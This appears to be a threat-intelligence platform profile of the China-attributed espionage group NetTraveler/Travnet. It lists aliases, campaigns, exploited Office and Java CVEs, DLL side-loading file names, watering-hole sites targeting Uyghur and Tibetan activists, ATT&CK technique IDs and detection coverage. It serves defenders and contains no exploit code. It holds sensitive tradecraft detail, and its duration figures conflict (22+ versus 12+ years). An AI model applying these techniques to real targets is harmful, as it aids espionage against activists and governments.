Home/Threat Actor/NetTraveler / Travnet
Threat Actor

NetTraveler / Travnet

nettraveler_travnet · china · active since 2004

NetTraveler / Travnet (canonical Kaspersky GReAT naming per June 14, 2013 disclosure by Costin Raiu at 2013 Cybersecurity Forum Washington D.C.

naming derives from internal malware string "NetTraveler is Running!" present in earliest versions.

alternative naming Travnet / Netfile / Red Star APT) is a People's Republic of China state-aligned cyber- espionage cluster active publicly since at least 2004-2005 , approximately 22+ years of tracked operational continuity, operationally one of the longest-running publicly-tracked China-attributed clusters in industry analysis.

per Kaspersky GReAT analysis ~50-operator Chinese-speaking team with working English knowledge.

~350 confirmed victims (estimated ~1,000 total across 40 countries with highest concentrations in Mongolia + India + Russia)

signature target categories include Tibetan/Uyghur activists (operationally consistent with PRC suppression of diaspora activism), government agencies and embassies, oil industry companies, scientific research centers, universities, military contractors, and foreign ISPs.

signature operationally-amateurish but successful tradecraft using Microsoft Office publicly- known vulnerabilities CVE-2012-0158 + CVE-2010-3333 + CVE- 2015-2545 (no 0day investment) with custom NetTraveler Trojan + Saker backdoor (Saker shares DLLs JustTempFun + ServiceMain with Gh0st RAT operationally indicating same developers)

DLL side-loading via fsguidll.exe / RasTls.exe legitimate signed executables sideloading malicious fslapi.dll / rastls.dll payloads.

MNKit Office malicious document builder signature artifacts.

custom protocols resembling BASE64 for exfiltration.

Shanghai Meicheng Technology Beijing domain registrar concentration.

look-alike domain RAR-SFX hosting + watering hole tradecraft on Uyghur/Tibetan compromised websites (weststock[.]org + Islamic Association of Eastern Turkistan iframe injection delivering Java applets new.jar + ie.jar with CVE-2013-2465 Java exploit payloads)

operational connections to Gh0st RAT developers, Titan Rain historical China operations, and Red October shared-victim operational overlap (without cluster coordination)

same-actor pre-2016 PlugX operational era per ProofPoint research (PlugX-to-NetTraveler operational pivot January 2016)

post-disclosure operational continuity via infrastructure rotation to China/Hong Kong/Taiwan rather than operational cessation.

fills historical longest-running China-attributed APT cell in the curated corpus.

china confidence: high 13 aliases
Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited4

Profile

NetTraveler / Travnet (canonical Kaspersky GReAT naming "NetTraveler" from internal malware string "NetTraveler is Running!" present in earliest versions of malware.

alternative naming "Travnet" / "Netfile" / "Red Star APT") is a People's Republic of China state-aligned cyber-espionage cluster active publicly since at least 2004-2005, approximately 22+ years of tracked operational continuity, operationally one of the longest-running publicly-tracked China-attributed clusters in industry analysis. Per Kaspersky GReAT canonical June 14, 2013 disclosure (presented by Costin Raiu at 2013 Cybersecurity Forum, Washington, D.C.): "We estimate the group size to about 50 individuals, most of which speak Chinese natively and have working knowledge of the English language." The cluster has compromised ~350 confirmed victims (estimated ~1,000 total across 40 countries with highest concentrations in Mongolia, India, and Russia). Per ProofPoint research: same actor used PlugX before January 2016 pivot to NetTraveler, with operational ecosystem within the broader PlugX-using-China- APT-cluster ecosystem. Operational phases: (1) EARLIEST OPERATIONAL EMERGENCE (2004-2005). Internal "NetTraveler is Running!" string present in earliest malware versions. Established operational tradecraft pattern: spear-phishing with malicious Office documents exploiting CVE-2010-3333 + CVE-2012-0158, custom NetTraveler Trojan + Saker backdoor, comprehensive intelligence collection. (2) OFFICE-DOCUMENT-EXPLOITATION ERA (2010-2013). Signature historical exploit tradecraft using two publicly-known Microsoft Office vulnerabilities. No 0day investment; successful through patient social engineering + known-CVE exploitation. (3) KASPERSKY CANONICAL DISCLOSURE (June 14, 2013). Costin Raiu presented at 2013 Cybersecurity Forum, Washington D.C. Documented 350+ confirmed victims, ~1,000 total estimated across 40 countries. Operational connections to Gh0st RAT developers (Saker backdoor shared DLLs JustTempFun + ServiceMain) and Titan Rain historical China operations established. (4) POST-DISCLOSURE OPERATIONAL CONTINUITY (June 2013+). Operationally distinctive, cluster operators "shutdown all known C2s and moved them to new servers in China, Hong Kong and Taiwan. However, they also continued the attacks unhindered." (5) JAVA EXPLOIT WATERING HOLE TRADECRAFT ADOPTION (September 2013+). CVE-2013-2465 Java exploit + watering hole compromise of Uyghur-related websites (weststock[.]org, Islamic Association of Eastern Turkistan compromise via iframe injection). (6) PROOFPOINT RUSSIA + EUROPEAN CAMPAIGN (January 2016+). Same-actor pivot from PlugX to NetTraveler. Nuclear energy, geopolitics, and military bait themes. Russia/Mongolia/ Belarus/Europe target geography expansion. (7) CVE-2015-2545 ADOPTION (2016+). Continued tradecraft evolution. (8) CONTINUED OPERATIONS (Post-2016). Operational tempo continues at reduced public visibility through 2026.

Signature operational tradecraft
  • Tibetan/Uyghur activist signature targeting: signature sustained targeting category operationally consistent with PRC suppression of diaspora activism. Watering hole tradecraft on Uyghur diaspora websites with Java applet payloads.
  • Office-document-exploit signature tradecraft: CVE- 2012-0158 + CVE-2010-3333 + CVE-2015-2545. No 0day investment.
  • NetTraveler Trojan + Saker backdoor: signature malware platform. Saker shares DLLs with Gh0st RAT (JustTempFun + ServiceMain), operational lineage to Gh0st RAT developers.
  • DLL side-loading via fsguidll.exe / RasTls.exe tradecraft: clean signed executables sideload malicious fslapi.dll / rastls.dll payloads.
  • MNKit Office malicious document builder: signature builder artifact pattern in malicious Word documents.
  • Custom protocols resembling BASE64 for exfiltration: signature C2 encoding pattern.
  • Shanghai Meicheng Technology Beijing registrar concentration: signature infrastructure attribution indicator.
  • Look-alike domain RAR-SFX hosting: signature spear- phishing infrastructure pattern.
  • Watering hole on Uyghur/Tibetan compromised websites: signature drive-by infection tradecraft.
  • Country-specific lure adaptation: "Depending on the targeted country, the actor switches lures and decoys accordingly.".
  • ~50-operator Chinese-speaking team profile: per Kaspersky.
  • 40-country / ~1,000-victim documented scale: signature victim distribution pattern. The cluster fills the historical longest-running China- attributed APT cell in this curated corpus, operationally distinct from the 33 China-attributed clusters already curated through (a) earliest active period (since at least 2004, operationally one of the longest historical periods); (b) signature Tibetan/Uyghur activist targeting alongside government/military targeting; (c) Saker backdoor with Gh0st RAT shared DLLs operational lineage; (d) historical CVE-2012-0158 + CVE-2010-3333 signature exploitation pattern; (e) operational connections to Titan Rain historical China operations and Red October shared-victim pattern.

Aliases

13
nettravelernettraveler is runningnet_travelertravnetnetfiletrojan-spy.win32.travnetdownloader.win32.nettravelerred star aptred_star_aptin pursuit of optical fibers and troop intelnettraveler_apttravnet_aptnettraveler_travnet

Notable Campaigns

9
2016-PresentContinued Operations Post-2016 (Limited Public Visibility)
2016ProofPoint Russia + European Campaign (January 2016+)
2016CVE-2015-2545 Office RCE Exploitation Era (2016+)
2013Kaspersky GReAT Canonical NetTraveler Disclosure (June 14, 2013)
2013Post-Disclosure Operational Continuity (June 2013+)
2013Java Exploit CVE-2013-2465 Watering Hole Adoption (September 2013+)
2010-2013CVE-2010-3333 + CVE-2012-0158 Exploit Era (2010-2013)
2004-PresentTibetan / Uyghur Activist Signature Targeting
2004NetTraveler Earliest Operational Emergence (2004-2005)

Attribution & Reporting

Attributed by
Kaspersky GReATProofPointSymantec / Broadcom Threat Hunter TeamTrend MicroSecurityWeekThreatpostMandiantMicrosoft Threat Intelligence CenterCrowdStrikeSOPHOS X-OpsSentinelOne / SentinelLabsCostin Raiu (Kaspersky GReAT Director, presented at 2013 Cybersecurity Forum)Cisco TalosCitizen Lab (University of Toronto, for adjacent Tibetan/Uyghur targeting tracking)
Key reporting
reportKaspersky GReAT (Costin Raiu, presented at 2013 Cybersecurity Forum, Washington D.C.): 'NetTraveler is Running!', Red Star APT Attacks Compromise High-Profile Victims (Securelist, June 14, 2013), canonical comprehensive NetTraveler disclosure
reportKaspersky GReAT: NetTraveler is Back, The 'Red Star' APT Returns With New Tricks (Securelist, September 2013), Java exploit adoption follow-up
reportProofPoint: NetTraveler APT Targets Russian and European Interests (July 2016), PlugX-to-NetTraveler operational pivot disclosure
reportProofPoint: In Pursuit of Optical Fibers and Troop Intel (earlier disclosure tracking same actor pre-NetTraveler pivot, PlugX era)
reportSymantec / Broadcom Threat Hunter Team: NetTraveler / Travnet Operational Analysis
reportThreatpost: NetTraveler Espionage Campaign Uncovered, Links to Gh0st RAT and Titan Rain (June 2013)
reportSecurityWeek: Decade-old NetTraveler Malware Used in Multi-National Attacks (July 2016)
reportCyber Defense Magazine: NetTraveler APT Still Targets European and Russian Interests (2016)
reportInfosecurity Magazine: NetTraveler spyware compromised 1,000 political and industrial targets
reportESET / WeLiveSecurity: NetTraveler Cyber-Espionage Tibet/Uyghur Tracking (June 2013)
reportCitizen Lab (University of Toronto): NetTraveler Tibet/Uyghur Targeting Analysis (June 2013)
reportTrend Micro: NetTraveler Adjacent Cluster Tracking
reportMicrosoft Threat Intelligence: NetTraveler Operational Context
reportCrowdStrike Global Threat Report: China-Aligned Historical Cluster Tracking
reportMandiant: NetTraveler / Red Star APT Operational Analysis
reportSOPHOS X-Ops: China-Aligned Cluster Tracking (Historical Era)
reportSentinelLabs: NetTraveler Operational Analysis
reportCisco Talos: NetTraveler Adjacent Tracking
reportMITRE ATT&CK Group G0036, NetTraveler
reportMalpedia Actor Profile: NetTraveler / Travnet

Operational

State sponsor

People's Republic of China state-aligned cluster, China attribution is operationally well-established per Kaspersky GReAT canonical June 14, 2013 disclosure (Costin Raiu presented at 2013 Cybersecurity Forum in Washington, D.C.). Per Kaspersky GReAT sinkhole + malware analysis: "We estimate the group size to about 50 individuals, most of which speak Chinese natively and have working knowledge of the English language." The China- attribution is operationally supported by multiple convergent evidence streams: (a) Operator-team Chinese language pattern: ~50-operator team profile with Chinese-native-speaker majority per Kaspersky analysis. Operational tradecraft demonstrates working English knowledge consistent with state-aligned Chinese cluster bilingual operational requirements.

(b) Beijing domain registrar concentration: per ProofPoint analysis of subsequent NetTraveler campaigns: "The actor set up its domains with the same registrar in Beijing, referred to as 'Shanghai Meicheng Technology Information Development Co., Ltd.,' but provided randomized information at registration (except for email addresses)." The Beijing-registrar concentration operationally supports China-aligned attribution. (c) Operational connections to other China-attributed clusters: per Kaspersky GReAT disclosure, NetTraveler operations share operational lineage with Gh0st RAT developers, "one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT." The Saker backdoor module used by NetTraveler shares export functions via two DLLs named JustTempFun and ServiceMain, both DLL names also found in Gh0st RAT. Operational IP-range overlap exists between NetTraveler and Zegost / Gh0st RAT operations.

NetTraveler also shares operational lineage with Titan Rain historical China- attributed operations from the mid-2000s era. (d) Shared-victim operational overlap with Red October: per Kaspersky, "some of the victims targeted by NetTraveler are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns." Red October was a Russia-aligned cluster, the shared-victim pattern operationally suggests both clusters independently targeted the same high-value entities (a Russian military contractor, a Tajikistan government entity, embassy workers in Iran, Belgium, Kazakhstan, and Belarus) rather than cluster-coordination.

(e) Target selection consistent with PRC strategic interests: Tibetan and Uyghur activists (signature sustained targeting consistent with PRC suppression of diaspora activism), oil and gas industry (PRC energy security interests), scientific research centers (PRC strategic technology acquisition), universities, governments and governmental institutions (PRC diplomatic intelligence), embassies, military contractors (PRC strategic intelligence). Highest infection concentrations in Mongolia, India, and Russia, operationally consistent with PRC regional strategic interest priorities. (f) Saker backdoor + Gh0st RAT operational DLL sharing: NetTraveler uses the Saker backdoor module to steal system information, with DLLs named JustTempFun and ServiceMain, same DLL names found in Gh0st RAT.

Per Kaspersky GReAT: "the same developers responsible for Gh0st RAT" likely wrote the Saker backdoor module. (g) DLL side-loading via fsguidll.exe / RasTls.exe tradecraft: per SecurityWeek + ProofPoint: "The NetTraveler Trojan uses a DLL side-loading technique (a clean signed executable fsguidll.exe or RasTls.exe is used to sideload fslapi.dll or rastls.dll, respectively)." The DLL side-loading tradecraft is operationally consistent with broader Chinese-APT-cluster tradecraft patterns. (h) Same-actor PlugX-then-NetTraveler operational pivot: per ProofPoint research: "this group utilized PlugX malware to target various telecommunication and military interests in Russia.

Since January 2016, this group switched to using NetTraveler and varied its targets, but otherwise left most of its tools, techniques, and procedures (TTPs) unchanged." The PlugX-then-NetTraveler operational pivot operationally places NetTraveler within the broader PlugX-using-China-APT-cluster ecosystem (PlugX is the most operationally consequential modular RAT used by Chinese-state-aligned clusters historically). No formal People's Republic of China government attribution has been publicly issued. The attribution operates at "China-attributed" / "China-based actor" assessment level by major cybersecurity industry analysts (Kaspersky GReAT, ProofPoint, Symantec, SecurityWeek, and others).

Operational significance: NetTraveler is one of the longest-running publicly-tracked China-attributed clusters, with earliest sample compilation dates from approximately 2004-2005 and continued operations through at least 2016+ , operationally ~12+ years of tracked operational continuity. The cluster operates as a historical precursor and operational-lineage anchor for the broader Chinese-state- aligned cyber-espionage ecosystem in the curated corpus.

Motivations
china_state_aligned_intelligence_collection, tibetan_uyghur_diaspora_activist_surveillance, prc_diplomatic_intelligence_collection, strategic_industry_intelligence_collection, military_contractor_intelligence_collection, scientific_research_strategic_technology_acquisition, prc_regional_strategic_interest_intelligence, oil_gas_industry_intelligence_collection
Sectors
tibetan_uyghur_activiststibetan_government_in_exileuyghur_diaspora_organizationsgovernment_administrationgovernment_embassiesoil_industry_companiesoil_and_gas_industryscientific_research_centersuniversitiesprivate_companiesmilitary_contractorsforeign_internet_service_providerstelecommunications_providersweapons_manufacturersnuclear_power_installations
Regions
mongoliaindiarussiakazakhstankyrgyzstanchina_internal_dissident_surveillancetajikistansouth_koreaspaingermanyunited_statescanadaunited_kingdomchilemoroccogreecebelgiumaustriaukrainelithuaniabelarusaustraliahong_kongjapaniranturkeypakistanthailandqatarjordanglobal_40_countries_total

Techniques Used

60
T1003T1003.001T1005T1010T1012T1016T1020T1021T1021.001T1021.002T1027T1027.001T1027.002T1029T1033T1036T1036.004T1036.005T1039T1041T1048T1053T1053.005T1056T1056.001T1057T1059T1059.001T1059.003T1059.005T1059.007T1068T1069T1070T1070.004T1071T1071.001T1074T1074.001T1078T1082T1083T1087T1090T1090.001T1090.002T1106T1113T1114T1114.001T1119T1129T1132T1132.001T1140T1189T1190T1203T1204T1204.001

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)58/60 · 96%
Analytics (MITRE CAR)28/60 · 46%
Runtime / container (Falco)8/60 · 13%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)15/60 · 25%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MNKIT OFFICE EXPLOIT BUILDERSAKER JUSTTEMPFUN DLLSAKER SERVICEMAIN DLLSAKER BACKDOORSHANGHAI MEICHENG TECHNOLOGY BEIJING REGISTRAR

CVEs Exploited

4
CVECVE-2010-3333
CVECVE-2012-0158
CVECVE-2013-2465
CVECVE-2015-2545
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin